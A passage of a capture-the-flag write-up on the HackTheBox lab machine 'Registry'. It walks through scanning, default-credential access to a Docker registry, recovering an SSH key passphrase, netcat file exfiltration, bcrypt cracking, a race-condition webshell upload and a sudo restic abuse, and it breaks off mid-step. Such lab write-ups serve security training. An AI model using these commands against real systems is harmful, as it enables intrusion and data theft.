<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox: Registry" /><meta property="og:locale" content="en" /><meta name="description" content="Walkthroughs and research as seen through the eyes of a new pentester." /><meta property="og:description" content="Walkthroughs and research as seen through the eyes of a new pentester." /><link rel="canonical" href="https://megawattsec.com/posts/HackTheBox-Registry/" /><meta property="og:url" content="https://megawattsec.com/posts/HackTheBox-Registry/" /><meta property="og:site_name" content="MegaWattSec" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-03-20T00:00:00-04:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox: Registry" /><meta name="twitter:site" content="@megawattsec" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-05-12T15:06:06-04:00","datePublished":"2020-03-20T00:00:00-04:00","description":"Walkthroughs and research as seen through the eyes of a new pentester.","headline":"HackTheBox: Registry","mainEntityOfPage":{"@type":"WebPage","@id":"https://megawattsec.com/posts/HackTheBox-Registry/"},"url":"https://megawattsec.com/posts/HackTheBox-Registry/"}</script><title>HackTheBox: Registry | MegaWattSec</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="MegaWattSec"><meta name="application-name" content="MegaWattSec"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/jamack_close.jpg " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">MegaWattSec</a></div><div class="site-subtitle font-italic">Adventures of a Forever-Newb</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/megawattsec" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/megawattsec" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['megawattsec','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>HackTheBox: Registry</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox: Registry</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/megawattsec">Dustin</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1584676800" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2020-03-20 </em> </span> <span> Updated <em class="timeago" data-ts="1652382366" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-05-12 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="3192 words"> <em>17 min</em> read</span></div></div></div><div class="post-content"><p><img data-src="/assets/img/registry/Registry-Logo.png" alt="Registry Box" data-proofer-ignore></p><h1 id="about-the-box">About the box</h1><p>Registry took me through several services that I’ve never used before, including one that I wanted to get to know better, Docker. The box begins with an online Docker registry available that’s protected by easily guessable creds. After getting into the docker image, credentials are found that get SSH access for the user account. Using the SSH, enumerate the machine to find another service called “Bolt CMS” and figure out how to upload a webshell to get access to a second user. Then use another service “Restic Backup” to exfiltrate the root flag. Also, I explore a way to get root shell access.</p><h1 id="initial-recon">Initial Recon</h1><h2 id="nmap-scan"><span class="mr-2">NMAP Scan</span><a href="#nmap-scan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Using NMAP, scan the IP address with <code class="language-plaintext highlighter-rouge">nmap -n -sC -sV -Pn -p- -oN nmap.txt 10.10.10.159</code>. This sets the options:</p><ul><li><code class="language-plaintext highlighter-rouge">-n</code> for no DNS lookup<li><code class="language-plaintext highlighter-rouge">-sC</code> for default scripts<li><code class="language-plaintext highlighter-rouge">-sV</code> for service version probing<li><code class="language-plaintext highlighter-rouge">-Pn</code> to skip ping check<li><code class="language-plaintext highlighter-rouge">-p-</code> for scan all ports<li>and <code class="language-plaintext highlighter-rouge">-oN nmap.txt</code> for setting the output text file</ul><p>The output we’ll get is:</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">~/htb/Registry ᐅ nmap -n -sC -sV -Pn -p- -oN nmap.txt 10.10.10.159
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 12:35 EST
Nmap scan report for registry.htb (10.10.10.159)
Host is up (0.040s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.88 seconds</code></pre></figure><p>Analyzing this NMAP output, we see three ports that are open and their service versions. Keep notes about the services open and what their versions are. In this case, there is an Nginx web server operating on HTTP and HTTPS. The key takeaway here is the SSL-cert is showing the hostname in what must be a self-signed certificate, “docker.registry.htb”. When finding new hostnames, add them to your “/etc/hosts” file because certain VirtualHosts will require exact hostnames for you to reach them.</p><h2 id="enumerate-dockerregistryhtb"><span class="mr-2">Enumerate docker.registry.htb</span><a href="#enumerate-dockerregistryhtb" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Use a web directory enumeration program like gobuster to find out some things that can be reached. As an experiment, I ran gobuster first against the IP address, and then against the hostname “docker.registry.htb”. Only when using the hostname was I able to find anything interesting. Using just the IP address merely gave me the files for the default installation of Nginx.</p><p>The default installation files found with the IP address:</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">~/htb/Registry ᐅ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.10.10.159
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.159
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/07 21:07:00 Starting gobuster
===============================================================
/.bash_history (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/install (Status: 301)
===============================================================
2020/03/07 21:07:22 Finished
===============================================================</code></pre></figure><p>Useful results found with the hostname:</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">~/htb/Registry ᐅ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u docker.registry.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://docker.registry.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/07 21:07:49 Starting gobuster
===============================================================
/v2 (Status: 301)
===============================================================
2020/03/07 21:08:11 Finished                                               
===============================================================</code></pre></figure><p>If we do some research on the page “/v2” and registry, we find out that it holds an API endpoint for docker-registry version 2. Since there doesn’t seem to be anything else for initial enumeration, we can move on to getting into the docker-registry service.</p><h1 id="attacking-the-docker-registry">Attacking The Docker Registry</h1><h2 id="gaining-access-with-docker-run"><span class="mr-2">Gaining access with docker run</span><a href="#gaining-access-with-docker-run" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>To access the remote registry, we need to get the self-signed cert working right. Open the certificate in the web browser while on the “/v2” page and export it under “/etc/docker/certs.d/”.</p><p>Then visit the page found “/v2” under “docker.registry.htb”, and a login is presented. <img data-src="/assets/img/registry/2020-03-07_21h13_16.png" alt="" data-proofer-ignore></p><p>There isn’t any special technique to getting past the login credentials for the docker.registry.htb/v2 page. Just some common guesses will lead you to <code class="language-plaintext highlighter-rouge">admin: admin</code>, which lets you use the service.</p><p>Reading the <a href="https://docs.docker.com/registry/spec/api/">docker API reference</a>, we find listing repositories is done by simply visiting the page “/v2/_catalog”. Trying it in the browser shows only one, “bolt-image”.</p><p>We want to be able to download and run the image, so first fire up the docker service with <code class="language-plaintext highlighter-rouge">sudo service docker start</code> then use these steps:</p><ol><li>To download the image, use the command <code class="language-plaintext highlighter-rouge">sudo docker pull docker.registry.htb/bolt-image</code>.<li>After it’s pulled, we will be able to see the image listed in our local images with <code class="language-plaintext highlighter-rouge">sudo docker images</code>.<li>Copy the image id listed for bolt-image to use later.<li>And finally, to use the image we have to run it and open a bash shell with <code class="language-plaintext highlighter-rouge">sudo docker run -it --rm 601499e98a60 /bin/bash</code>. The run command uses <code class="language-plaintext highlighter-rouge">-it</code> flag to specify that we want to use an interactive TTY shell, and <code class="language-plaintext highlighter-rouge">--rm</code> says to clean up the files used after we’re done. Replace “601499e98a60” with the image id copied earlier.</ol><h2 id="enumerate-bolt-image"><span class="mr-2">Enumerate bolt-image</span><a href="#enumerate-bolt-image" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>We are root when we’re dropped into the shell inside “bolt-image”, so enumerating to figure out the next step should be easy.</p><p>There are some interesting files in the home directory. Using <code class="language-plaintext highlighter-rouge">ls -laR /root</code> shows a private SSH key and config.</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">root@6c855edb286c:/# ls -laR /root
/root:
total 24
drwx------ 1 root root 4096 May 25  2019 .
drwxr-xr-x 1 root root 4096 Mar  8 05:07 ..
lrwxrwxrwx 1 root root    9 May 25  2019 .bash_history -&gt; /dev/null
-rw-r--r-- 1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r-- 1 root root  148 May 25  2019 .profile
drwxr-xr-x 2 root root 4096 May 25  2019 .ssh
-rw------- 1 root root 1061 May 25  2019 .viminfo

/root/.ssh:
total 24
drwxr-xr-x 2 root root 4096 May 25  2019 .
drwx------ 1 root root 4096 May 25  2019 ..
-rw-r--r-- 1 root root   60 May 25  2019 config
-rw------- 1 root root 3326 May 25  2019 id_rsa
-rw-r--r-- 1 root root  743 May 25  2019 id_rsa.pub
-rw-r--r-- 1 root root  444 May 25  2019 known_hosts</code></pre></figure><p>Read the SSH config file and you’ll see another use of the hostname, this time it’s just “registry.htb”. We also see what user SSH is used with, “bolt”. Make notes of the findings. Print out the SSH key and copy/paste it into a file on your box. Add “registry.htb” to your “/etc/hosts” file as well.</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">root@6c855edb286c:~/.ssh# cat config
Host registry
  User bolt
  Port 22
  Hostname registry.htb</code></pre></figure><p>So with this, we should be able to log into the SSH service on port 22 of registry.htb. However, when trying to add the private key, we’re presented with the passphrase request. Unfortunately, my password cracking tools weren’t able to crack that passphrase, so avoid diving down that rabbit hole.</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">~/htb/registry ᐅ ssh-add ./bolt_rsa
Enter passphrase for ./bolt_rsa: 
Bad passphrase, try again for ./bolt_rsa: </code></pre></figure><p>To find the passphrase, go back to enumerating the bolt-image. There were some other files in the root directory we could look at. Most of the files are fairly standard, and the bash history going to “/dev/null” is normal for pentesting boxes. However, the “.viminfo” file is different.</p><p>Print it out and you’ll see two files that have been recently edited: “/var/www/html/sync.sh” and “/etc/profile.d/01-ssh.sh”.</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">root@6c855edb286c:~# cat .viminfo
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=latin1


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:q!
|2,0,1558797180,,"q!"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /var/www/html/sync.sh
|4,48,1,0,1558797180,"/var/www/html/sync.sh"
'1  1  0  /etc/profile.d/01-ssh.sh
|4,49,1,0,1558797115,"/etc/profile.d/01-ssh.sh"

# Jumplist (newest first):
-'  1  0  /var/www/html/sync.sh
|4,39,1,0,1558797180,"/var/www/html/sync.sh"
-'  1  0  /etc/profile.d/01-ssh.sh
|4,39,1,0,1558797115,"/etc/profile.d/01-ssh.sh"
-'  1  0  /etc/profile.d/01-ssh.sh
|4,39,1,0,1558797115,"/etc/profile.d/01-ssh.sh"

# History of marks within files (newest to oldest):

&gt; /var/www/html/sync.sh
        *       1558797175      0
        "       1       0

&gt; /etc/profile.d/01-ssh.sh
        *       1558797112      0
        "       1       0</code></pre></figure><p>Print them out and you’ll see a hardcoded passphrase for the SSH key!</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">root@6c855edb286c:~# ls -la /var/www/html/sync.sh
-rwxr-xr-x 1 root root 53 May 25  2019 /var/www/html/sync.sh
root@6c855edb286c:~# 
root@6c855edb286c:~# cat /var/www/html/sync.sh
#!/bin/bash
rsync -azP registry:/var/www/html/bolt .
root@6c855edb286c:~# cat /var/www/html/bolt
cat: /var/www/html/bolt: No such file or directory
root@6c855edb286c:~# cat /etc/profile.d/01-ssh.sh
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
root@6c855edb286c:~# </code></pre></figure><h1 id="ssh-bolt-user-enumeration">SSH Bolt User Enumeration</h1><p>After adding the SSH key with the passphrase found, we’re able to login to “registry.htb” as “bolt”. Use the command <code class="language-plaintext highlighter-rouge">ssh bolt@registry.htb</code> to get to the user shell, where the “user.txt” flag is found.</p><p><img data-src="/assets/img/registry/2020-03-08_21h02_13.png" alt="" data-proofer-ignore></p><p>After claiming the user flag, we need to find the next thing to exploit. There is no obvious enumeration finds that allow privilege escalation, like a “sudo -l” entry. Instead, look for the config files for Nginx, since we know that’s the kind of web server the box is using. You can use the “find” program to look for it quickly.</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">bolt@bolt:~$ find /etc -name *nginx* 2&gt;/dev/null
/etc/rc1.d/K01nginx
/etc/rc6.d/K01nginx
/etc/rc0.d/K01nginx
/etc/rc3.d/S01nginx
/etc/rc5.d/S01nginx
/etc/ufw/applications.d/nginx
/etc/rc4.d/S01nginx
/etc/default/nginx
/etc/init.d/nginx
/etc/systemd/system/multi-user.target.wants/nginx.service
/etc/logrotate.d/nginx
/etc/rc2.d/S01nginx
/etc/nginx
/etc/nginx/nginx.conf
bolt@bolt:~$ </code></pre></figure><h2 id="parsing-nginx-config-files"><span class="mr-2">Parsing Nginx config files</span><a href="#parsing-nginx-config-files" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>The “nginx.conf” file links all config files under the “/etc/nginx/sites-enabled” as well. That’s where you’ll see which sites are on the box and their specific settings. There’s a config file for the “docker.registry.htb” site that we already know about, and another one for “registry.htb”. Look at that one to see more about it.</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">bolt@bolt:/etc/nginx/sites-enabled$ cat 01.registry.conf 
server {
    listen 80;
    listen [::]:80;
    listen 443 ssl;
    include snippets/self-signed.conf;
    include snippets/ssl-params.conf;

    root /var/www/html;
    index index.php index.html; 

    server_name registry.htb;

    location = /bolt/app/database/bolt.db {
        deny all;
        return 404;
    }

    location = /bolt/bolt {
        try_files               $uri $uri/ /bolt/index.php?$query_string;
    }

    location ^~ /bolt/bolt/ {
        try_files                     $uri /bolt/index.php?$query_string;
    }

    location ^~ /bolt/(.*)$ {
        try_files               $uri $uri/ /bolt/index.php?$query_string;
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
    }

    location ~ /\.ht {
        deny all;
    }
}</code></pre></figure><p>That config file has details about a database called “bolt.db” and a URL location “/bolt/bolt”. Open up your web browser and go to that location to find the Bolt app.</p><p><a href="/assets/img/registry/2020-03-08_21h19_20.png"><img data-src="/assets/img/registry/2020-03-08_21h19_20.png" alt="" data-proofer-ignore></a></p><h1 id="accessing-bolt-app">Accessing Bolt App</h1><p>It’s usually good practice to try previously found credentials on new targets like this, but so far we don’t have the right ones. Instead, continue the enumeration by looking into the other info found from the config file, “bolt.db”.</p><p>Using the <code class="language-plaintext highlighter-rouge">file</code> command to find out what kind of database it is, you’ll see it’s made with sqlite3.</p><figure class="highlight"><pre><code class="language-console" data-lang="console"><span class="gp">bolt@bolt:/var/www/html/bolt/app/database$</span><span class="w"> </span>file bolt.db
<span class="go">bolt.db: SQLite 3.x database, last written using SQLite version 3022000</span></code></pre></figure><p>Unfortunately, the box doesn’t have the SQLite3 program installed so we can’t directly open it from there, it has to first be copied out. One way to do that is by using Netcat.</p><p>There must be some firewall rules set up to drop outgoing connections because none of my attempts to send the file back the way I normally do it worked. So instead, it has to be done by setting up the listener on the remote box first.</p><p><code class="language-plaintext highlighter-rouge">nc -lvnp 5555 &lt; bolt.db</code></p><p>And on your local machine use Netcat to connect to the listener, with it set up to save data sent to it as the database file.</p><p><code class="language-plaintext highlighter-rouge">nc registry.htb 5555 &gt; bolt.db</code></p><p>Once you enter that command, it will connect and receive the database, then you’ll just need to kill the connection and analyze the file!</p><h2 id="analyzing-boltdb-with-sqlite3"><span class="mr-2">Analyzing bolt.db with sqlite3</span><a href="#analyzing-boltdb-with-sqlite3" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Open the newly downloaded database file with <code class="language-plaintext highlighter-rouge">sqlite3 bolt.db</code>, and it will tell you to use “.help” for usage directions.</p><figure class="highlight"><pre><code class="language-console" data-lang="console"><span class="go">~/htb/registry ᐅ sqlite3 bolt.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
</span><span class="gp">sqlite&gt;</span><span class="w"> </span></code></pre></figure><p>To list out the tables, use the command <code class="language-plaintext highlighter-rouge">.tables</code>.</p><figure class="highlight"><pre><code class="language-console" data-lang="console"><span class="gp">sqlite&gt;</span><span class="w"> </span>.tables
<span class="go">bolt_authtoken    bolt_field_value  bolt_pages        bolt_users      
bolt_blocks       bolt_homepage     bolt_relations  
bolt_cron         bolt_log_change   bolt_showcases  
bolt_entries      bolt_log_system   bolt_taxonomy </span></code></pre></figure><p>Any table with “users” in the name is usually good for enumeration, so dump that table with the SQL query <code class="language-plaintext highlighter-rouge">select * from bolt_users</code>.</p><figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="n">sqlite</span><span class="o">&gt;</span> <span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">bolt_users</span><span class="p">;</span>
<span class="mi">1</span><span class="o">|</span><span class="k">admin</span><span class="o">|</span><span class="err">$</span><span class="mi">2</span><span class="n">y</span><span class="err">$</span><span class="mi">10</span><span class="err">$</span><span class="n">e</span><span class="p">.</span><span class="n">ChUytg9SrL7AsboF2bX</span><span class="p">.</span><span class="n">wWKQ1LkS5Fi3</span><span class="o">/</span><span class="n">Z0yYD86</span><span class="p">.</span><span class="n">P5E9cpY7PK</span><span class="o">|</span><span class="n">bolt</span><span class="o">@</span><span class="n">registry</span><span class="p">.</span><span class="n">htb</span><span class="o">|</span><span class="mi">2020</span><span class="o">-</span><span class="mi">03</span><span class="o">-</span><span class="mi">09</span> <span class="mi">03</span><span class="p">:</span><span class="mi">46</span><span class="p">:</span><span class="mi">01</span><span class="o">|</span><span class="mi">10</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">15</span><span class="p">.</span><span class="mi">237</span><span class="o">|</span><span class="k">Admin</span><span class="o">|</span><span class="p">[</span><span class="nv">"files://leax.php"</span><span class="p">]</span><span class="o">|</span><span class="mi">1</span><span class="o">||||</span><span class="mi">0</span><span class="o">||</span><span class="p">[</span><span class="nv">"root"</span><span class="p">,</span><span class="nv">"everyone"</span><span class="p">]</span>
<span class="n">sqlite</span><span class="o">&gt;</span> </code></pre></figure><p>It looks like there is a user “admin” and a password hash in the record. Use whichever is your favorite password cracker for this, mine is John The Ripper.</p><h2 id="bolt-user-credential-cracking-with-john-the-ripper"><span class="mr-2">Bolt user credential cracking with John The Ripper</span><a href="#bolt-user-credential-cracking-with-john-the-ripper" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Start by copying the hash into a text file. Then use the command to call john on it with <code class="language-plaintext highlighter-rouge">john --wordlist=/usr/share/wordlists/rockyou.txt bolt.admin.hash</code>.</p><figure class="highlight"><pre><code class="language-console" data-lang="console"><span class="go">~/htb/registry ᐅ sudo john --wordlist=/usr/share/wordlists/rockyou.txt bolt.admin.hash
[sudo] password for kali: 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (?)
1g 0:00:00:08 DONE (2020-03-10 21:54) 0.1153g/s 37.71p/s 37.71c/s 37.71C/s strawberry..dennis
Use the "--show" option to display all of the cracked passwords reliably
Session completed</span></code></pre></figure><p>Turns out the password is cracked right away as “strawberry”. Just use “admin” and “strawberry” to login at the prompt on the app page. <a href="/assets/img/registry/2020-03-10_22h01_30.png"><img data-src="/assets/img/registry/2020-03-10_22h01_30.png" alt="Bolt App Dashboard" data-proofer-ignore></a></p><h1 id="bolt-app-hacking">Bolt App Hacking</h1><p>It turns out that there is a way to upload some files at two places in the app, both are options under “File Management”. <a href="/assets/img/registry/2020-03-16_22h07_10.png"><img data-src="/assets/img/registry/2020-03-16_22h07_10.png" alt="File Upload Capabilities" data-proofer-ignore></a></p><p>If we test both upload points, we will notice that files sent via the regular <strong>Uploaded Files</strong> section only stay for a minute or so before being deleted. However, if we send files via the <strong>View/edit Templates</strong> section, it will stay until the box is reset. So only use the <strong>View/edit Templates</strong> method of file upload.</p><p>Unfortunately, the file upload doesn’t allow PHP files. However, there’s a <a href="https://vuln.whitesourcesoftware.com/vulnerability/CVE-2019-9185/">CVE</a> on the version used that says extensions for file uploads can be changed to PHP. See the following screenshot taken after attempting a PHP file upload. <a href="/assets/img/registry/2020-03-16_22h09_13.png"><img data-src="/assets/img/registry/2020-03-16_22h09_13.png" alt="PHP File Type Error" data-proofer-ignore></a></p><p>Also, there is a configuration file that defines which file types are allowed and which aren’t. The config file can be found at “Configuration -&gt; Main Configuration” <a href="/assets/img/registry/2020-03-16_22h20_39.png"><img data-src="/assets/img/registry/2020-03-16_22h20_39.png" alt="Main Configuration" data-proofer-ignore></a></p><p>It says that PHP files are never allowed even if they are within the list, but for some reason, that’s not true in this case. If you can change the list, you can upload PHP files. <a href="/assets/img/registry/2020-03-16_22h17_00.png"><img data-src="/assets/img/registry/2020-03-16_22h17_00.png" alt="Accepted File Types" data-proofer-ignore></a></p><h2 id="editing-the-main-config-file-and-exploiting-a-race-condition"><span class="mr-2">Editing the main config file and exploiting a race condition</span><a href="#editing-the-main-config-file-and-exploiting-a-race-condition" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>The configuration file can be changed from the Bolt dashboard, but it is almost immediately reverted back to its original state. This can be noticed by looking at the directory listing before and after saving the file. And if we look back at the config file, any changes made will have disappeared.</p><p>Before: <a href="/assets/img/registry/2020-03-17_20h05_21.png"><img data-src="/assets/img/registry/2020-03-17_20h05_21.png" alt="Before" data-proofer-ignore></a></p><p>After: <a href="/assets/img/registry/2020-03-17_20h08_40.png"><img data-src="/assets/img/registry/2020-03-17_20h08_40.png" alt="After" data-proofer-ignore></a></p><p>Since the file can be changed at least momentarily, a race condition can be exploited to change the accepted file types and then upload a webshell before the config is reverted back. One way to do that is by writing a script that goes through the steps of saving the config and uploading a file in a fraction of a second.</p><blockquote><p><strong>Note:</strong> Check out the source code for my version of this script on <a href="/assets/img/registry/savephp.py">github</a>. Notice that it involves CSRF tokens for everything, so those have to be extracted before making the API calls.</p></blockquote><h2 id="uploading-and-using-a-webshell-for-enumeration"><span class="mr-2">Uploading and using a webshell for enumeration</span><a href="#uploading-and-using-a-webshell-for-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Once we have the upload script working, use it to send your favorite PHP webshell, then browse to it or click on it from the dashboard.</p><p><a href="/assets/img/registry/2020-03-17_21h56_56.png"><img data-src="/assets/img/registry/2020-03-17_21h56_56.png" alt="Uploaded File" data-proofer-ignore></a></p><p>Running through basic enumeration with the PHP webshell, we find out that the <code class="language-plaintext highlighter-rouge">www-data</code> user (which we’re logged in as) has a command it can run through <code class="language-plaintext highlighter-rouge">sudo</code> without a password. The program to run is <em>Restic</em>, which is a pretty good looking backup program (thanks <strong>thek</strong>, I might use this for actual backups later).</p><p><a href="/assets/img/registry/2020-03-17_22h14_54.png"><img data-src="/assets/img/registry/2020-03-17_22h14_54.png" alt="Sudo Command" data-proofer-ignore></a></p><p>The reason this is exploitable is the <code class="language-plaintext highlighter-rouge">sudo</code> command has a wildcard after “rest”, which means we can insert <em>any</em> rest server as the backup target. So all we need to do is <a href="https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html#rest-server">set up our own rest server</a> locally and send a command via our webshell to backup stuff to it.</p><h1 id="getting-root">Getting Root</h1><h2 id="setting-up-a-restic-repo-and-server"><span class="mr-2">Setting up a restic repo and server</span><a href="#setting-up-a-restic-repo-and-server" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>To <a href="https://github.com/restic/rest-server">set up a local restic server</a>, first initialize a rest repository with <code class="language-plaintext 